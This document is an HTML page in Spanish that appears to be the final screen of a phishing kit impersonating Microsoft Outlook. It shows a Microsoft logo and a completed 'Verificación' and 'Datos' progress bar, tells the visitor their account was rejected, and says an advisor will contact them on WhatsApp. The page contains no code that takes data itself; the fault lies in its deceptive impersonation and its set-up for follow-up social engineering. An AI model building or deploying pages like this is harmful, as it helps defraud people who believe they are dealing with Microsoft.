<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Proceso Finalizado - Outlook</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Segoe UI', Arial, sans-serif;
}
body {
background-color: #f2f2f2;
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
padding: 20px;
}
.container {
width: 100%;
max-width: 440px;
}
.success-box {
background-color: white;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
padding: 40px;
width: 100%;
text-align: center;
}
.logo {
width: 180px;
display: block;
margin: 0 auto 20px;
}
h2 {
font-size: 24px;
font-weight: 600;
margin-bottom: 8px;
text-align: center;
color: #1b1b1b;
}
p {
font-size: 14px;
color: #616161;
text-align: center;
margin-bottom: 24px;
}
.success-icon {
width: 80px;
height: 80px;
background-color: #e6f7ee;
border-radius: 50%;
display: flex;
align-items: center;
justify-content: center;
margin: 0 auto 25px;
animation: pulse 2s infinite;
}
.success-icon i {
font-size: 40px;
color: #d63333; /* Cambiado a rojo */
}
.btn-primary {
width: 100%;
background-color: #0067b8;
color: white;
border: none;
border-radius: 4px;
padding: 12px;
font-size: 15px;
font-weight: 600;
cursor: pointer;
transition: background-color 0.3s;
margin-top: 20px;
}
.btn-primary:hover {
background-color: #005da6;
}
.whatsapp-info {
background-color: #f8f9fa;
border-radius: 6px;
padding: 15px;
margin: 20px 0;
border-left: 4px solid #25D366;
}
.whatsapp-info p {
margin-bottom: 10px;
font-size: 13px;
}
.whatsapp-icon {
color: #25D366;
font-size: 18px;
margin-right: 5px;
}
.status-bar {
display: flex;
justify-content: space-between;
margin-bottom: 30px;
position: relative;
}
.status-bar:before {
content: '';
position: absolute;
top: 50%;
left: 0;
right: 0;
height: 2px;
background-color: #e6e6e6;
z-index: 1;
}
.status-step {
width: 30px;
height: 30px;
border-radius: 50%;
background-color: #e6e6e6;
display: flex;
align-items: center;
justify-content: center;
z-index: 2;
position: relative;
}
.status-step.active {
background-color: #0067b8;
color: white;
}
.status-step.completed {
background-color: #107c41;
color: white;
}
.status-step.completed:after {
content: '✓';
font-size: 14px;
}
.status-label {
position: absolute;
top: 35px;
left: 50%;
transform: translateX(-50%);
font-size: 10px;
white-space: nowrap;
color: #616161;
}
@keyframes pulse {
0% {
box-shadow: 0 0 0 0 rgba(16, 124, 65, 0.4);
}
70% {
box-shadow: 0 0 0 10px rgba(16, 124, 65, 0);
}
100% {
box-shadow: 0 0 0 0 rgba(16, 124, 65, 0);
}
}
.fade-in {
animation: fadeIn 1s ease-in;
}
@keyframes fadeIn {
from { opacity: 0; transform: translateY(10px); }
to { opacity: 1; transform: translateY(0); }
}
</style>
</head>
<body>
<div class="container">
<div class="success-box fade-in">
<img src="https://www.freepnglogos.com/uploads/microsoft-logo-png-transparent-background-1.png" alt="Microsoft Logo" class="logo">
<div class="status-bar">
<div class="status-step completed">
<div class="status-label">Verificación</div>
</div>
<div class="status-step completed">
<div class="status-label">Datos</div>
</div>
<div class="status-step active">
<div class="status-label">Finalizado</div>
</div>
</div>
<div class="success-icon">
<i class="fas fa-times"></i>
</div>
<h2>¡Proceso fallido!</h2>
<p>Su cuenta ha sido rechazada.</p>
<div class="whatsapp-info">
<p><i class="fab fa-whatsapp whatsapp-icon"></i> <strong>Asesoría WhatsApp</strong></p>
<p><strong>Un asesor especializado se comunicará con usted via WhatsApp en breves minutos para brindarle asistencia personalizada.</strong></p>
</div>
<p>Gracias por confiar en nosotros. Su seguridad es nuestra prioridad.</p>
<button class="btn-primary" onclick="window.location.href='index.html'">Finalizar</button>
</div>
</div>
</body>
</html>